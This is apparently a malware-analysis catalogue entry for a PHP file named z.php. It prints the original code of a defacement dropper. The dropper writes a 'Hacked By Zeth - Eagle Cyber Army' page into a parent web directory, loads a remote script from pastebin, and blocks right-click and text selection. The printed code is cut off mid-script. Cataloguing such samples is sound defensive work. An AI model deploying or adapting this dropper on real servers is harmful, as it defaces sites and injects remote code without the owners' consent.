PHP Malware Analysis

Back to list

Filename: z.php

Tags

URLs
Title
  • Hacked By Zeth - Eagle Cyber Army ZethEcateam - teameca - Zeth
Environment
  • error_reporting

Deobfuscated code

No debofuscation yet...

Original code

<?php error_reporting(0); fwrite(fopen('../../../../../Zeth.html','w'),'<html>
<head>
<title>Hacked By Zeth - Eagle Cyber Army ZethEcateam - teameca - Zeth</title>
<meta name="Author" content="Zeth Of Eagle Cyber Army"/>
<meta name="copyright" content="Zeth"/>
<meta charset="UTF-8" />
<meta content=" HacKeD By Zeth Zeth -Eagle Cyber Army -| HiddenCoder | Mr.D0os | AntiSu | ./0ma3r | Mr.BOB | R3V0 | Zeroqueen | bl4ck_knight | 0x66 | BlurryFace | Zahrat27 | 3xcalibur | V0RT3X5 | Kaizen | HornetSource | Ascrew27 | TiGER-M@TE | Mr.Domoz | Ne0-H4cker" name="description"/>
<meta content=" HacKeD By Zeth Zeth Eagle Cyber Army,| HiddenCoder | Mr.D0os | AntiSu | ./0ma3r | Mr.BOB | R3V0 | Zeroqueen | bl4ck_knight | 0x66 | BlurryFace | Zahrat27 | 3xcalibur | V0RT3X5 | Kaizen | HornetSource | Ascrew27 | TiGER-M@TE | Mr.Domoz | Ne0-H4cker" name="keywords"/>
<meta content=" HacKeD By Zeth - Zeth Eagle Cyber Army - eca team - Eagle Cyber Army Eca , teameca , ecatea, TiGER-M@TE | Mr.Domoz | Ne0-H4cker" name="Abstract"/>
<meta name=" HacKeD By Zeth - | Yhuricka | ~Mr.GH05T | Cyb3rGh05t | HiddenCoder | AntiSu | xShadow | R0dd3CK | BlurryFace | TN.4LD4 | 3XCALIBUR | Gord1 | Mr.L~ | roosevelt |"/>
<meta property="og:image" content="http://i.imgur.com/Nivtnfu.png"/>
<meta name="language" content="en" />
<meta content='general' name='rating' />
<meta content='google' name='generator' />
<meta content='follow,all' name='msnbot' />
<meta content='follow,all' name='alexabot' />
<meta content='bangladesh' name='geo.placename' />
<meta content="index,follow,all" name="googlebot" />
<meta http-equiv="X-UA-Compatible" content="IE-edge" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link href="https://i.imgur.com/59z7cHZ.gif" rel="Shortcut Icon" />
<link href="http://fonts.googleapis.com/css?family=Orbitron:400,900" rel="stylesheet" type="text/css">
<link href='http://fonts.googleapis.com/css?family=Abel:400,700' rel='stylesheet' type='text/css'>
<script src="http://ajax.googleapis.com/…/libs/jquery/1.9.1/jquery.min.js"></script>
<script type="text/javascript" src="https://pastebin.com/raw/b3Y0FNwJ"></script>
</head>
<style type="text/css">@import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);body{background-image:url("https://i.imgur.com/5K7OpSU.jpg");background-color:black;background-repeat:fixed;background-size:99%;background-position:top center;overflow:hidden;cursor:none;margin:0px;}svg{width:600px;height:100px;display:block;position:relative;overflow:hidden;margin:0 auto;background:transparent;}text{filter:url(#filter);fill:white;font-family:'Share Tech Mono',sans-serif;font-size:100px;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;}#headM{font-family:Orbitron;position:fixed;left:0px;right:0px;bottom:0px;background:transparent;text-align:center;}.title{font-size:30px;font-family:Abel;font-weight:bold;color:#ffffff;text-shadow:0px 0px 10px black;}.title span{font-size:50px;font-family:Abel;font-weight:bold;color:#ffffff;text-shadow:0px 0px 10px black;}.greets{font-family:Abel;color:black;}.footer{font-family:Orbitron;color:white;font-size:10px;text-shadow:0px 0px 40px black;}</style>
<script type="text/javascript">
function disableselect(e) {
return false
}
function reEnable() {
return true
}
//if IE4+
document.onselectstart = new Function("return false")
//if NS6
if (window.sidebar) {
document.onmousedown = disableselect
document.onclick = reEnable
}
var message = "";
function clickIE() {
if (document.all) {
(message);
return false;
}
}
function clickNS(e) {
if (document.layers || (document.getElementById && !document.all)) {
if (e.which == 2 || e.which == 3) {
(message);
return false;
}
}
}
if (document.layers) {
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown = clickNS;
} else {
document.onmouseup = clickNS;
document.oncontextmenu = clickIE;
}
document.oncontextmenu = new Function("return false")
if ((document.getElementById) &&
window.addEventListener || window.attachEvent) {
(function() {
var num = 30;
var timer = 30;
var enableinNS6 = 1 
var y = [];
var x = [];
var fall = [];
var theFlakes = [];
var sfs = [];
var step = [];
var currStep = [];
var h, w, r;
var d = document;
var pix = "px";
var domWw = (typeof window.innerWidth == "number");
var domSy = (typeof window.pageYOffset == "number");
var idx = d.getElementsByTagName('div').length;
if (d.documentElement.style &&
typeof d.documentElement.style.MozOpacity == "string")
num = 12;
for (i = 0; i < num; i++) {
sfs[i] = Math.round(1 + Math.random() * 1);
document.write('<div id="flake' + (idx + i) + '" style="position:absolute;top:0px;left:0px;width:' + sfs[i] + 'px;height:' + sfs[i] + 'px;background-color:#ffffff;font-size:' + sfs[i] + 'px"><\/div>');
currStep[i] = 0;
fall[i] = (sfs[i] == 1) ?
Math.round(2 + Math.random() * 2) : Math.round(3 + Math.random() * 2);
step[i] = (sfs[i] == 1) ?
0.05 + Math.random() * 0.1 : 0.05 + Math.random() * 0.05;
}
if (domWw) r = window;
else {
if (d.documentElement &&
typeof d.documentElement.clientWidth == "number" &&
d.documentElement!'); ?>